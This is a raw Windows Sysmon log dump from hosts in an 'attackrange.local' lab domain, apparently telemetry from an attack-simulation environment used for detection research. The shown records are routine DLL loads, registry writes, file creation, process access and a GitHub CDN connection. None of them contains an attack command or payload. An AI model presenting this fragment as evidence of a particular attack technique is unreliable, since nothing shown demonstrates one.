17:30:08.415{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 734700x80000000000000001529906Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid 734700x80000000000000001529905Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\windows.storage.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft 
disk space 354300x80000000000000001530368Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.240{00000000-0000-0000-0000-000000000000}388<unknown process>-tcptruefalse10.0.1.15win-host-5.attackrange.local64680-false185.199.111.133cdn-185-199-111-133.github.com443https 13241300x80000000000000001530367Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:11.338{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation\LastOrientationDWORD (0x00000000) 12241200x80000000000000001530366Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:11.338{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation 13241300x80000000000000001530365Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:11.338{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001530364Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:11.338{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.RKPRY.RKR.15Binary Data 11241100x80000000000000001530363Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:11.137{21761711-83AE-607D-1100-00000000BB01}968C:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat2021-04-19 13:21:46.711 
23542300x80000000000000001530362Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:11.137{21761711-83AE-607D-1100-00000000BB01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=185A3B37BBF711196A22A43FF781BB41,SHA256=2074BDF0E0719413EB25BA125C987FAB96269D18433277A8EA3F42CC1C065B2Afalsefalse - insufficient disk space 10341000x80000000000000001061019Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:11.043{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061018Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:11.043{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001061017Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
17:30:11.000{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EE3F6955AA8D3CB427F12E8CDF711DE,SHA256=84987C98F00E8BB5B7364B968DCAAE6E3FD06B14D069B5A42802A46801865CE7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001530383Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:12.979{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530382Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:12.979{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B8E08D0FC288798311E9D85F8FEF836,SHA256=40B1E8884462BD189110AD537698DDA97B5A84F421A7A0C9E9CD01EF15527840falsefalse - insufficient disk space 11241100x80000000000000001530381Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:12.741{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xml2021-04-19 13:22:46.774 23542300x80000000000000001530380Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:12.741{21761711-842A-607D-9700-00000000BB01}3716NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program 
Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=E21F5C2105D3482548EE1DCEAA8E3F18,SHA256=A62C5AB5FD16B72845400EE5338C4D5D0AC27884510730AA80A58BEA4A9B021Efalsefalse - insufficient disk space 13241300x80000000000000001530379Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:12.741{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:000000000011069A\VirtualDesktopBinary Data 12241200x80000000000000001530378Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:12.741{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:000000000011069A 13241300x80000000000000001530377Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:12.679{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation\LastOrientationDWORD (0x00000000) 12241200x80000000000000001530376Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:12.679{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation 10341000x80000000000000001530375Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:12.679{21761711-84C9-607D-F200-00000000BB01}37844604C:\Windows\Explorer.EXE{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft 
Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001530374Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:12.679{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Office\16.0\Common\Roaming\RoamingLastWriteTimeWordBinary Data 13241300x80000000000000001530373Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:12.679{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Office\16.0\Common\Roaming\RoamingLastSyncTimeWordBinary Data 10341000x80000000000000001530372Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:12.663{21761711-84C9-607D-F200-00000000BB01}37844996C:\Windows\Explorer.EXE{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001530371Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:12.663{21761711-84C9-607D-F200-00000000BB01}37844996C:\Windows\Explorer.EXE{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061080Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.555{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-6124-6080-965C-00000000BA01}6324C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061079Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.553{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001061078Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.553{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061077Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.553{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061076Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
17:30:12.553{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061075Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.552{761B69BB-818A-607D-0500-00000000BA01}408532C:\Windows\system32\csrss.exe{761B69BB-6124-6080-965C-00000000BA01}6324C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001061074Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.552{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-6124-6080-965C-00000000BA01}6324C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001061073Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.552{761B69BB-6124-6080-965C-00000000BA01}6324C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001061072Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.550{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D722DAF61B86214D441B0B369E2F8FD,SHA256=6C89454B2245697C57D0C2B7A1F79C7B6CBB70252A8C833BA353BC7CB56D8277,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000001061071Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.357{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061070Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.357{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061069Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
17:30:12.357{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061068Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.357{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061067Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
17:30:12.357{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061066Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.357{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061065Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
17:30:12.357{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061064Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.357{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061063Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
